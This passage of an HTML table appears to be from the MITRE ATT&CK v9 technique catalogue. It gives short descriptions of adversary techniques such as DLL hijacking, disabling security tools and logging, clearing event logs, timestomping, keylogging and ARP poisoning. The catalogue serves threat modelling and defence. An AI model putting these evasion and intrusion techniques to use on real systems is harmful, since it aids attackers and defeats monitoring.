</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1590/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1590/005"> IP Addresses </a> </td> <td> Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and/or where/how their publicly-facing infrastructure is hosted. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1590/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1590/006"> Network Security Appliances </a> </td> <td> Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1591"> T1591 </a> </td> <td> <a href="/versions/v9/techniques/T1591"> Gather Victim Org Information </a> </td> <td> Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1591/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1591/001"> Determine Physical Locations </a> </td> <td> Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1591/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1591/002"> Business Relationships </a> </td> <td> Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1591/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1591/003"> Identify Business Tempo </a> </td> <td> Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1591/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1591/004"> Identify Roles </a> </td> <td> Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1200"> T1200 </a> </td> <td> <a href="/versions/v9/techniques/T1200"> Hardware Additions </a> </td> <td> Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping, man-in-the-middle encryption breaking, keystroke injection, kernel memory reading via DMA, adding new wireless access to an existing network, and others. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1564"> T1564 </a> </td> <td> <a href="/versions/v9/techniques/T1564"> Hide Artifacts </a> </td> <td> Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1564/001"> Hidden Files and Directories </a> </td> <td> Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a 'hidden' file. These files don't show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls -a</code> for Linux and macOS). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1564/002"> Hidden Users </a> </td> <td> Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1564/003"> Hidden Window </a> </td> <td> Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1564/004"> NTFS File Attributes </a> </td> <td> Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1564/005"> Hidden File System </a> </td> <td> Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1564/006"> Run Virtual Instance </a> </td> <td> Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. 
By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1564/007"> VBA Stomping </a> </td> <td> Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1574"> T1574 </a> </td> <td> <a href="/versions/v9/techniques/T1574"> Hijack Execution Flow </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1574/001"> DLL Search Order Hijacking </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1574/002"> DLL Side-Loading </a> </td> <td> Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to <a href="/versions/v9/techniques/T1574/001">DLL Search Order Hijacking</a>, side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1574/004"> Dylib Hijacking </a> </td> <td> Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1574/005"> Executable Installer File Permissions Weakness </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. 
These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1574/006"> Dynamic Linker Hijacking </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name. These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1574/007"> Path Interception by PATH Environment Variable </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. 
Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1574/008"> Path Interception by Search Order Hijacking </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/009"> .009 </a> </td> <td> <a href="/versions/v9/techniques/T1574/009"> Path Interception by Unquoted Path </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/010"> .010 </a> </td> <td> <a href="/versions/v9/techniques/T1574/010"> Services File Permissions Weakness </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. 
If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/011"> .011 </a> </td> <td> <a href="/versions/v9/techniques/T1574/011"> Services Registry Permissions Weakness </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for the Registry to redirect from the originally specified executable to one that they control, in order to launch their own code at service start. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, <a href="/versions/v9/techniques/T1059/001">PowerShell</a>, or <a href="/versions/v9/software/S0075">Reg</a>. Access to Registry keys is controlled through Access Control Lists and permissions. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/012"> .012 </a> </td> <td> <a href="/versions/v9/techniques/T1574/012"> COR_PROFILER </a> </td> <td> Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). 
These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1562"> T1562 </a> </td> <td> <a href="/versions/v9/techniques/T1562"> Impair Defenses </a> </td> <td> Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1562/001"> Disable or Modify Tools </a> </td> <td> Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1562/002"> Disable Windows Event Logging </a> </td> <td> Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more. This data is used by security tools and analysts to generate detections. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1562/003"> Impair Command History Logging </a> </td> <td> Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1562/004"> Disable or Modify System Firewall </a> </td> <td> Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via the command line, editing Windows Registry keys, and the Windows Control Panel. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1562/006"> Indicator Blocking </a> </td> <td> An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting or even disabling host-based sensors, such as Event Tracing for Windows (ETW), by tampering with settings that control the collection and flow of event telemetry. These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as <a href="/versions/v9/techniques/T1059/001">PowerShell</a> or <a href="/versions/v9/techniques/T1047">Windows Management Instrumentation</a>. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1562/007"> Disable or Modify Cloud Firewall </a> </td> <td> Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in <a href="/versions/v9/techniques/T1562/004">Disable or Modify System Firewall</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1562/008"> Disable Cloud Logs </a> </td> <td> An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1525"> T1525 </a> </td> <td> <a href="/versions/v9/techniques/T1525"> Implant Internal Image </a> </td> <td> Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike <a href="/versions/v9/techniques/T1608/001">Upload Malware</a>, this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1070"> T1070 </a> </td> <td> <a href="/versions/v9/techniques/T1070"> Indicator Removal on Host </a> </td> <td> Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and formats of logs are platform- or product-specific; however, standard operating system logs are captured as Windows events or Linux/macOS files such as <a href="/versions/v9/techniques/T1552/003">Bash History</a> and /var/log/*. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1070/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1070/001"> Clear Windows Event Logs </a> </td> <td> Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1070/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1070/002"> Clear Linux or Mac System Logs </a> </td> <td> Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. 
Subfolders in this directory categorize logs by their related functions, such as: </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1070/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1070/003"> Clear Command History </a> </td> <td> In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1070/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1070/004"> File Deletion </a> </td> <td> Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1070/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1070/005"> Network Share Connection Removal </a> </td> <td> Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and <a href="/versions/v9/techniques/T1021/002">SMB/Windows Admin Shares</a> connections can be removed when no longer needed. <a href="/versions/v9/software/S0039">Net</a> is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1070/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1070/006"> Timestomp </a> </td> <td> Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1202"> T1202 </a> </td> <td> <a href="/versions/v9/techniques/T1202"> Indirect Command Execution </a> </td> <td> Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking <a href="/versions/v9/software/S0106">cmd</a>. For example, <a href="/versions/v9/software/S0193">Forfiles</a>, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a <a href="/versions/v9/techniques/T1059">Command and Scripting Interpreter</a>, Run window, or via scripts. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1105"> T1105 </a> </td> <td> <a href="/versions/v9/techniques/T1105"> Ingress Tool Transfer </a> </td> <td> Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary-controlled system through the command and control channel to bring tools into the victim network, or through alternate protocols with another tool such as FTP. 
Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1490"> T1490 </a> </td> <td> <a href="/versions/v9/techniques/T1490"> Inhibit System Recovery </a> </td> <td> Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of <a href="/versions/v9/techniques/T1485">Data Destruction</a> and <a href="/versions/v9/techniques/T1486">Data Encrypted for Impact</a>. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1056"> T1056 </a> </td> <td> <a href="/versions/v9/techniques/T1056"> Input Capture </a> </td> <td> Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. <a href="/versions/v9/techniques/T1056/004">Credential API Hooking</a>) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. <a href="/versions/v9/techniques/T1056/003">Web Portal Capture</a>). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1056/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1056/001"> Keylogging </a> </td> <td> Adversaries may log user keystrokes to intercept credentials as the user types them. 
Keylogging is likely to be used to acquire credentials for new access opportunities when <a href="/versions/v9/techniques/T1003">OS Credential Dumping</a> efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1056/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1056/002"> GUI Input Capture </a> </td> <td> Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need more privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: <a href="/versions/v9/techniques/T1548/002">Bypass User Account Control</a>). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1056/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1056/003"> Web Portal Capture </a> </td> <td> Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1056/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1056/004"> Credential API Hooking </a> </td> <td> Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials. 
Unlike <a href="/versions/v9/techniques/T1056/001">Keylogging</a>, this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via: </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1559"> T1559 </a> </td> <td> <a href="/versions/v9/techniques/T1559"> Inter-Process Communication </a> </td> <td> Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occur when processes are stuck in a cyclic waiting pattern. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1559/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1559/001"> Component Object Model </a> </td> <td> Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1559/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1559/002"> Dynamic Data Exchange </a> </td> <td> Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. 
Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1534"> T1534 </a> </td> <td> <a href="/versions/v9/techniques/T1534"> Internal Spearphishing </a> </td> <td> Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is a multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1570"> T1570 </a> </td> <td> <a href="/versions/v9/techniques/T1570"> Lateral Tool Transfer </a> </td> <td> Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with <a href="/versions/v9/techniques/T1021/002">SMB/Windows Admin Shares</a> or <a href="/versions/v9/techniques/T1021/001">Remote Desktop Protocol</a>. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1185"> T1185 </a> </td> <td> <a href="/versions/v9/techniques/T1185"> Man in the Browser </a> </td> <td> Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1557"> T1557 </a> </td> <td> <a href="/versions/v9/techniques/T1557"> Man-in-the-Middle </a> </td> <td> Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as <a href="/versions/v9/techniques/T1040">Network Sniffing</a> or <a href="/versions/v9/techniques/T1565/002">Transmitted Data Manipulation</a>. By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1557/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1557/001"> LLMNR/NBT-NS Poisoning and SMB Relay </a> </td> <td> By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1557/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1557/002"> ARP Cache Poisoning </a> </td> <td> Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. 
This activity may be used to enable follow-on behaviors such as <a href="/versions/v9/techniques/T1040">Network Sniffing</a> or <a href="/versions/v9/techniques/T1565/002">Transmitted Data Manipulation</a>. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1036"> T1036 </a> </td> <td> <a href="/versions/v9/techniques/T1036"> Masquerading </a> </td> <td> Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1036/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1036/001"> Invalid Code Signature </a> </td> <td> Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files. 
